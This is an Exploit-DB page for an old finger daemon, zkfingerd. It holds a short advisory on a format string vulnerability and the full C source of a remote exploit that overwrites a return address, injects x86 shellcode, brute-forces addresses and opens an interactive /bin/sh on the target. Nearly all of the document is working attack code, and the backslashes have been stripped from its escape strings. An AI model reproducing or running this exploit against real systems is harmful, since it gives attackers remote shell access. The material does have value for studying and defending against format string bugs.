https://www.exploit-db.com/exploits/22101

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/6404/info

zkfingerd is prone to a format string vulnerability. The affected function does not perform sufficient checks when displaying user-supplied input. It is possible to corrupt memory by passing format strings through the vulnerable function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values.

Successful exploitation of this issue may allow the attacker to execute arbitrary instructions, possibly, with elevated privileges. 

/*
 *
 *		remote exploit for zkfingerd-r3-0.9 linux/x86 
 *	gives uid of user who is running zkfingerd (default: nobody)              
 *		    	    by Marceta Milos 
 *                          [email protected]
 *             
 * 		use this for educational propouses only! 
 * 
 * 	For local attack, response based method could be used, but for
 *	remote we can use blind brute force method.
 *
 *	greets to scut, DeadMaker, stinger, harada and all others.
 *     
 */

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<unistd.h>
#include<sys/socket.h>
#include<arpa/inet.h>
#include<netdb.h>

#define Kb	1024
#define PORT	79      

#define green	"x1B[1;32m"
#define def	"x1B[0;37m"
#define wh	"x1B[1;37m"

#define SHOFF	576
#define RETLOC  0xbffff970      /* Slackware 8.0 */
#define FMT     "x25x25x2ex25x64x75x25x25x68x6e" 
#define DIG8	"x25x2ex66"
#define NOP	"x90"


	char linux_x86_wrx[]=		
 
		"x6ax01"		/* push	$0x1		*/
		"x5b"			/* pop %ebx		*/
		"xb8x0bx6ex4ex0b"	/* mov $0x0b4e6e0b,%eax	*/
		"x2dx01x01x01x01"	/* sub $0x01010101,%eax	*/
		"x50"			/* push %eax		*/
		"x89xe1"		/* mov %esp,%ecx	*/
		"x6ax04"		/* push	$0x4		*/
		"x58"			/* pop 	%eax		*/
		"x89xc2"		/* mov %eax,%edx	*/
		"xcdx80"		/* int $0x80		*/
		"xebx0c"		/* jmp 12		*/
		"x4b"			/* dec %ebx		*/
		"xf7xe3"		/* mul %ebx		*/
		"xfexca"		/* dec %dl		*/
		"x59"			/* pop %ecx		*/
		"xb0x03"		/* movb $0x3,%al	*/
		"xcdx80"		/* int $0x80		*/
		"xebx05"		/* jmp $0x05		*/
		"xe8xefxffxffxff";	/* call -17 		*/

	 char linux_x86_execve[]=

		"x6ax0b"		/* push $0x0b		*/		
		"x58"			/* pop %eax		*/
		"x99"			/* cdq			*/
		"x52"			/* push %edx		*/
		"x68x6ex2fx73x68"	/* push $0x68732f6e	*/
		"x68x2fx2fx62x69"	/* push $0x69622f2f	*/
	   	"x89xe3"		/* mov %esp,%ebx	*/
	        "x52"			/* push %edx		*/
	        "x53"			/* push %ebx		*/
	        "x89xe1"		/* mov %esp,%ecx	*/
	        "xcdx80";		/* int $0x80		*/

struct wr_addr {
                int low;
                int high;
                } addr;

int host_connect(char *, unsigned short int);
unsigned long int resolve(char *);

void usage(char *);
void exploit(char *, unsigned short int, unsigned long int);
void shell(int);

struct wr_addr convert_addr(unsigned long);

char sendbuf[Kb];
char recvbuf[Kb];

char *target		=	"127.0.0.1";
unsigned short int port = 	PORT;
unsigned long retloc 	=	RETLOC;
unsigned short int brute=	0;


int main(int argc, char **argv, char **env) {

	char c;

	printf(wh"n remote nobody exploit for zkfingerd-r3-0.9 by marcetam."def"nn");

	if (argc<2)
		usage(argv[0]);

        while ((c = getopt(argc, argv, "h:p:b:")) != EOF) {

                switch (c) {

		case 'h':
			target = optarg;
			break;
                case 'p':
			port = (short)atoi(optarg);
			break;
                case 'b':
			retloc	= strtoul(optarg, &optarg,16);
			brute	= 1;
			break;
		default:
			usage(argv[0]);
                        break;
                }
        }
	printf(" target is : nn");
	printf(" host : "wh"%s"def"n",target);
	printf(" port : "wh"%hu"def"n",port);
	printf(" ret  : "wh"%#lx"def"nn",retloc);
	printf(" attacking ... ");

	if (brute != 0) {

		while(1) {

	printf("trying ret : %#lxn", retloc);
			sleep(1);
			exploit(target, port, retloc);
			retloc -= 1;
		};
	} else exploit(target, port, retloc);

	return(0);
}

void usage(char *name){

        fprintf(stderr, " usage: %s -h <hostname> -p <port> -b <addr>nn",name);
        fprintf(stderr, " -h hostt target hostname (default 127.0.0.1)n"
			" -p portt port number (default 79)n"
			" -b addrt brute force retloc starting from addrn"
			"tt   WARNING : this will flood logfilenn");

        exit(EXIT_FAILURE);
}

void exploit(char *hostname, unsigned short int port, unsigned long int retaddr){ 

        unsigned long *ptr;

	char	ret[4],
		*chr;

	int	i,
		fd;

	bzero(sendbuf, Kb);
	bzero(recvbuf, Kb);
	bzero(ret, 4);

	fd = host_connect(hostname, port);

	ptr	=	(long *)ret;
	*(ptr)	=	retaddr;
	ret[sizeof(ret)] = '';

	for(i = 0;i < 3;i++)
		strcat(sendbuf,ret);
	ret[0] += 2;
	strcat(sendbuf, ret);

	for(i = 0;i < 40; i++)
		strcat(sendbuf, DIG8);      

	addr = convert_addr(retaddr + SHOFF);
	sprintf(sendbuf + strlen(sendbuf), FMT, addr.low);
	sprintf(sendbuf + strlen(sendbuf), FMT, addr.high);
	chr = sendbuf + strlen(sendbuf);

	for(i = 0;i < 128;i++)
		strcat(sendbuf, NOP);

	strcat(sendbuf, linux_x86_wrx);
	write(fd, sendbuf, Kb);
	read(fd, recvbuf, Kb);

	if (strcmp(recvbuf, "nmMn") == 0) {

		printf(green"YEAH!n"def);
		sleep(1);
		printf(" sending shellcode. n");
		write(fd, linux_x86_execve, sizeof(linux_x86_execve));
		printf(" starting shell #n"def);
		write(fd,"n", 1);
		write(fd,"uname -a;idn", 12);
		shell(fd);
	}
	else printf(wh" failed.nn"def);
}

struct wr_addr convert_addr(unsigned long addr) {

	struct wr_addr target;

	target.low  = (addr & 0x0000ffff);
	target.high = (addr & 0xffff0000) >> 16;

	if (target.high > target.low)
		target.high -= target.low;
	else {
		target.high += 0x10000;
		target.high -= target.low;
	}
	target.low -= 0x58;
	return(target);
}

unsigned long int resolve(char *hostname) {

	struct hostent *host;
	long            r;

	r = inet_addr(hostname);

	if (r == -1) { 
		host = gethostbyname(hostname);
		if (host == NULL) {
			return(0);
		} else { 
			return(*(unsigned long *)host->h_addr); 
	               }
	} 
	return(r);
}

int host_connect(char *hostname, unsigned short int port) {

        struct sockaddr_in	sa;
	int			fd;

        sa.sin_family	=	AF_INET;
        sa.sin_port	=	htons(port);
        fd		=	socket(AF_INET, SOCK_STREAM, 0);

        if (fd == -1)
		return(fd);

	if (!(sa.sin_addr.s_addr = resolve(hostname))) {
		close(fd);
                return(-1);
        }

	if (connect(fd, (struct sockaddr *)&sa, sizeof(struct sockaddr_in)) < 0) {
		perror("connect");
		close(fd);
		return(-1);
        }

        return(fd);
}

void shell(int fd) {

	char	buf[512];
	int	l;
        fd_set  fds;


        while (1) {

                FD_SET(0, &fds);
                FD_SET(fd, &fds);

                select(fd + 1, &fds, NULL, NULL, NULL);

                if (FD_ISSET(0, &fds)) {
                        l = read(0, buf, sizeof (buf));
                        if (l <= 0) {
                                perror("read user");
                                exit(EXIT_FAILURE);
                        }
                        write(fd, buf, l);
                }

                if (FD_ISSET(fd, &fds)) {
                        l = read(fd, buf, sizeof (buf));
                        if (l == 0) {
                                printf("connection closed by foreign host.n");
                                exit(EXIT_FAILURE);
                        } else if (l < 0) {
                                perror("read remote");
                                exit(EXIT_FAILURE);
                        }
                        write(1, buf, l);
                }
        }
}

/* www.marcetam.net */